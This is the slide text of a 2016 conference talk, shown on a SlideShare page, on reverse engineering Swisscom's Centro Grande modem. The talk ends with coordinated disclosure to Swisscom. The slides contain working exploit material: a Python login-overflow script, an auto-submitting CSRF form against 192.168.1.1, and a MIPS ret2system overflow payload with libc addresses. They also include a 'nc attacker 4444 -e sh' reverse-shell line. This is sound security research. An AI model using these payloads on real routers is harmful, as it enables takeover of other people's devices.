Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

Reverse engineering Swisscom's Centro Grande Modem

Alain Mowat & Thomas Imbert, Cyber Security Conference 2016

  • Soyez le premier à commenter

  • Soyez le premier à aimer ceci

Reverse engineering Swisscom's Centro Grande Modem

  1. 1. Reverse engineering Swisscom’sReverse engineering Swisscom’s Centro Grande modemsCentro Grande modems Alain Mowat & Thomas ImbertAlain Mowat & Thomas Imbert
  2. 2. 2whoami › Alain Mowat (@plopz0r) › Head of Audit division at SCRT › Pentest › Code review › Trainings › Mostly a Web App guy › Member of 0daysober CTF team › Watch other people exploiting cool vulns
  3. 3. 3Background › Why look into the Swisscom modems? › Why this talk? › I don’t actually own a Swisscom modem › Made it a bit harder to study...
  4. 4. 4Attack Surface › ADB# show netstat tcp 0 0 192.168.1.1:50602 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:9034 0.0.0.0:* LISTEN tcp 11 0 192.168.1.1:8080 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN tcp 0 0 192.168.1.1:22 0.0.0.0:* LISTEN tcp 0 0 192.168.1.1:23 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:7547 0.0.0.0:* LISTEN udp 0 0 0.0.0.0:9090 0.0.0.0:* udp 0 0 127.0.0.1:15000 0.0.0.0:* udp 0 0 0.0.0.0:53 0.0.0.0:* udp 0 0 0.0.0.0:323 0.0.0.0:* udp 0 0 0.0.0.0:67 0.0.0.0:* udp 0 0 0.0.0.0:68 0.0.0.0:* udp 0 0 178.199.180.148:5060 0.0.0.0:* udp 0 0 192.168.1.1:5351 0.0.0.0:* udp 0 0 0.0.0.0:1900 0.0.0.0:* udp 0 0 192.168.1.1:47863 0.0.0.0:* udp 0 0 0.0.0.0:123 0.0.0.0:* udp 0 0 ff02::1:2:547 :::* udp 0 0 :::53 :::* udp 0 0 :::323 :::* udp 0 0 :::123 :::* raw 0 0 0.0.0.0:2 0.0.0.0:* 2 raw 0 0 0.0.0.0:6 0.0.0.0:* 6 raw 0 0 :::58 :::*
  5. 5. 5Attack Surface › ADB# show processes 256 0 2040 S logd 259 0 1308 S klogd -c3 271 0 832 S ec 343 0 3236 S cm 350 0 0 SW [dsl0] 363 0 0 SW [bcmsw] 364 0 0 SW [bcmsw_timer] 365 0 0 SW< [linkwatch] 5889 0 1132 S dropbear -P /tmp/dropbear-local.pid -l 20 -p 192.168 6227 0 1312 S telnetd Local -u 20 -b 192.168.1.1:23 -I 300 6898 65534 2292 S nhttpd -c /tmp/nhttpd.conf 7362 0 1000 S dhcps /tmp/dhcps.conf 7910 0 764 S dns 8014 0 1088 S miniupnpd -i ptm0 -a 192.168.1.1 -N -I 4 8026 0 736 S /bin/wpspbc 8223 0 2676 S /usr/sbin/hostapd -B /tmp/wlan/config/hostapd.conf 9164 0 1664 S /bin/sh /etc/rc.common /etc/rc.d/S11services.sh boot 9177 0 2940 S cwmp 9204 0 1316 S /bin/sh /etc/ah/printk_dump.sh 9353 0 884 S ec 9553 0 1312 S /bin/sh /etc/ah/procSentinel.sh cm 300 11846 0 1332 S /bin/sh DHCPv4Client.sh 11848 0 1320 S udhcpc -S -R -f -W rgH7sqo?h@5Y -t 500000 -T 4 -o -C 14753 0 792 S igmpproxy -c /tmp/igmpproxy.conf -p /tmp/igmpproxy.p 15287 0 3576 S voip 15688 0 740 S tproxyd 80 8080 1 192.168.1.1 /ui/swc/parentalcontro 15923 0 1056 S N chronyd -f /tmp/chrony.conf 16770 0 820 S radvd 16812 0 2036 S dibbler-server start
  6. 6. 6Finding the firmware › Locate the firmware › https://www.swisscom.ch/en/residential/help/device/internet-router/centro- grande.html › Vx226x1_61400.sig › Version at the time › 6.14.00
  7. 7. 7Extracting the firmware › Binwalk (https://github.com/devttys0/binwalk) › Firmware modification kit › ./extract-firmware.sh
  8. 8. 8CPE WAN Management Protocol › Also known as TR-069 › Protocol that defines how to manage « Customer-premises Equipment » › cwmp binary › Listens to 0.0.0.0:7547 › iptables rule allows access only from certain Swisscom subnets
  9. 9. 9Web interface › Web server is nhttpd (http://www.nazgul.ch/dev_nostromo.html) › If a binary file is accessed through the web interface, it executes it › Directory traversal → Code Exec in version 1.9.3
  10. 10. 10Web interface › Mostly managed by a CGI called ui
  11. 11. 11Emulating the device › OpenWRT (https://openwrt.org/) › Linux distribution for embedded devices › Qemu (http://wiki.qemu.org/Main_Page) › Machine emulator and virtualizer
  12. 12. 12Configuring OpenWRT › make menuconfig › MIPS target › Add all debugging and networking tools › Cross-compile nhttpd › Generate ramdisk › Copy Swisscom firmware files to the image › Run image with qemu › qemu-system-mips -kernel openwrt-malta-be-vmlinux-ini- tramfs.elf -net tap -net nic -nographic -m 2048
  13. 13. 13Setting up the image › nhttpd server serverroot /www serveradmin webmaster@adbglobal.com servermimes conf/mimes docroot /www/htdocs docindex lanhosts logpid /tmp/logs user nobody disablehttp 0 notfound 501 sslport 443 sslcert /etc/certs/server.crt sslcertkey /etc/certs/server.key sslcertca /etc/certs/ca.pem sslcertreq * serverlisten 0.0.0.0 servername localhost
  14. 14. 14Web interface
  15. 15. 15YAPL ?
  16. 16. 16Web request overview nhttpd swc_login.yapl swc_common.yapl swc_firewall.yapl ... ui cm POST /ui/swc/login Environment setup Configuration command Get corresponding YAPL « script »
  17. 17. 17Configuration manager › Used to view and modify the device’s configuration › Bound to localhost:9034 › Also /tmp/cmctl socket › Several possible commands › GETO, GETV, … › SET, SETM, … › RESET, REBOOT, ... › DUMP, EXPORT, ...
  18. 18. 18Mandatory IDA graph
  19. 19. 19Configuration manager › Main loop listen on localhost port 9034 socket = accept while 1: input = socket.recv(16384) handleRequest(input) def handleRequest(input): type = validateRequestType(input) params = validateRequestParams(input) callTypeHandler(params)
  20. 20. 20Configuration Manager
  21. 21. 21Finalizing the image setup udhcpc -i br-lan cm touch /tmp/cmctl chmod 777 /tmp/cmctl nhttpd -c /www/nhttpd.cfg nc localhost 9034 DOM Device /etc/cm/tr181/dom/ DOM InternetGatewayDevice /etc/cm/tr098/dom/ CONF /etc/cm/conf/ ADD InternetGatewayDevice.WANDevice ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection SET Device.IP.Interface.1.IPv4Address.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1 SET Device.ManagementServer.X_ADB_ConnectionRequestInterface Device.IP.Interface.1 SET Device.IP.Interface.1.Status Up SET Device.Ethernet.Link.1.Name br-lan SET Device.DeviceInfo.SerialNumber 123456 SET Device.IP.Interface.1.X_ADB_Upstream true SET Device.IP.Interface.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
  22. 22. 22Running image
  23. 23. 23Configuration manager › Special syntax › Similar to SQL in certain ways › SELECT =~ GETV › UPDATE =~ SET › Conditions › GETO A.B.C.[Test=1] › GETO A.B.C.[Test~1] › GETO A.B.C.[Test!1]
  24. 24. 24Vulnerability #1 : Command overflow › Each call to recv is treated as a new command › By sending more than 16384 characters, we can craft a new configuration command › Logging in to the web interface generates a call to the configuration manager that looks like this › GETO Users.User.[Username=ATTACKER_CONTROLLED] › By providing a long username, we can exceed the 16348 limit and gene- rate a new request within the configuration manager › Allows complete control over the device › Change passwords › Allow remote access › ...
  25. 25. 25Vulnerability #1 : Command overflow ui cm GETO Users.User.[Username=A AAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA […] AAAAAAAAAAAAAAAAAAAAAAAAAAA REBOOTn recv(16384) recv(16384) send process(‘GETO Users……’) process(‘REBOOT’)
  26. 26. 26Exploit #1 : Command overflow from requests import post payload = dict() payload['userName'] = ( 16358 ) * 'a' + 'REBOOT' + 'n' payload['userPwd'] = 'a' payload['login'] = 'Login' payload['language'] = '' while 1: r = post('http://192.168.1.1/ui/swc/login/index', data=payload) D EM O
  27. 27. 27Vulnerability #2 : Login CSRF › Use CSRF to exploit someone else’s device <html> <body> <form method="POST" action="http://192.168.1.1/ui/swc/login/index"> <input type="hidden" name="userName" value="aaaaaaaaaa[...]aaaREBOOT%0a"/> <input type="hidden" name="userPwd" value="a"/> <input type="hidden" name="login" value="login"/> <input type="hidden" name="language" value=""/> </form> <script> document.forms[0].submit(); </script> </body> </html>
  28. 28. 28Exposed web interfaces – Centro Business
  29. 29. 29Vulnerability #3 : Buffer overflow(s) › Buffer overflow when parsing the name of XML files when performing certain commands (CONF, DOM, …) › Requirements › Arbitrarily-named XML file on the device › file and folder are both limited to 4096 in size parseFilesinFolder(folder): char path[4096]; files = scandir(folder) for file in files: if file ends with ".xml": strncat(path,folder,4096) strncat(path,file,4096) parseFile(filename)
  30. 30. 30Exploit #3 : Creating the XML file › The PATHSAVE command takes 2 arguments › An XML filename › Property that needs to be saved › PATHSAVE /tmp/test.xml Users.User.1.Password › Can use this to write an arbitrarily-named file on the device › Exploit can then be triggered by prepending folder with lots of / › CONF /////////////////////////////////////[…]/tmp/exploit.xml
  31. 31. 31Exploit #3 : Exploiting a MIPS binary Prologue Epilogue
  32. 32. 32Exploit #3 : Exploiting a MIPS binary › No ASLR on the device › No NX › No canaries › A version of nc with the -e switch is present on the device › Try to call system(‘nc attacker 4444 -e sh’) › Arguments are not passed on the stack though, but in registers › $a0 › $a1 › …
  33. 33. 33Exploit #3 : ret2system › Quick analysis gives address of system in libUclibc (Centro business) : › Libuclibc base : 0x2aaf8000 › System is at offset : 0x54610 › Real address : 0x2ab4c610 › Need a gadget in order to get our argument to system in $a0 › Make $a0 point to address in the stack › $s0 is also under our control
  34. 34. 34Exploit #3 : ret2system /tmp/aaaaaaaaaaaaaaaax2axb4xc6x10bbbbbbbbbbbbbbb bbbbbbbbbbbbbbbbbx2axb1xcaxacaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaareboot; #bbbb.xml $ra → gadget $s0 → system command 64 * ‘a’ (addiu $a0,$sp,64)
  35. 35. 35Exploit #3 : Full exploit D EM O
  36. 36. 36Disclosure timeline › 9 September 2015 : Initial disclosure to Swisscom › 10 September 2015 : Vulnerabilities acknowledged by Swisscom › 11 September 2015 : Vendor notified (ADB) › 18 September 2015 : Confirmation of vulns & quick fix available › 24 September 2015 : Test of quick fix › 29 September 2015 : Contact with ADB › October 2015 : Rollout of quick fix to all devices › January 2016 : Status full fix : › Centro grande : 100 % › Centro Business 1.0 : 50 % › Centro Business 2.0 : 100 % › 13 June 2016 : Disclure
  37. 37. 37Swisscom bounty › Combination of flaws rewarded with 3’000 CHF › Donated to the Ligue Vaudoise contre le Cancer › Swisscom Bug Bounty program is up & running › Talk is tomorrow afternoon :)
  38. 38. 38Conclusions › Attackers › Look into other processes on the modem › miniupnp › voip › Embedded devices are found everywhere nowadays › Huge attack surface › Less people reversing firmwares than searching for XSS › Defenders › Consider 0days in your penetration tests › Test your defense in depth › Test your ability to detect breaches

    Soyez le premier à commenter

    Identifiez-vous pour voir les commentaires

Alain Mowat & Thomas Imbert, Cyber Security Conference 2016

Vues

Nombre de vues

649

Sur Slideshare

0

À partir des intégrations

0

Nombre d'intégrations

0

Actions

Téléchargements

16

Partages

0

Commentaires

0

Mentions J'aime

0

×